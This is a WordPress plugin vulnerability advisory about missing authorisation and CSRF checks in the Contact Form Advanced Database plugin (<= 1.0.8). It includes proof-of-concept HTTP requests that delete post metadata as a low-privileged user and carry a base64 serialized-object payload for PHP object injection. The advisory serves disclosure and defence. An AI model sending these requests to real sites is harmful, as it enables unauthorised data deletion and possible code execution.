WordPress Plugin Vulnerabilities
Contact Form Advanced Database <= 1.0.8 - Unauthorised AJAX Calls
Description
The plugin does not have any authorisation as well as CSRF checks in its delete_cf7_data and export_cf7_data AJAX actions, available to any authenticated users, which could allow users with a role as low as subscriber to call them. The delete_cf7_data would lead to arbitrary metadata deletion, as well as PHP Object Injection if a suitable gadget chain is present in another plugin, as user data is passed to the maybe_unserialize() function without being first validated.
Proof of Concept
To delete the _edit_lock metadata of the post ID 18: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 77 Connection: close Cookie: [any authenticated user] action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock To prove the object injection, we inserted a new class in the plugin file: # class InjectionPoint{public function __destruct(){die("OBJECT INJECTION");}} POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 103 Connection: close Cookie: [any authenticated user] action=delete_cf7_data&data[0][id]=1data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=
Affects Plugins
References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Quentin VILLAIN (3wsec)
Submitter
Quentin VILLAIN (3wsec)
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)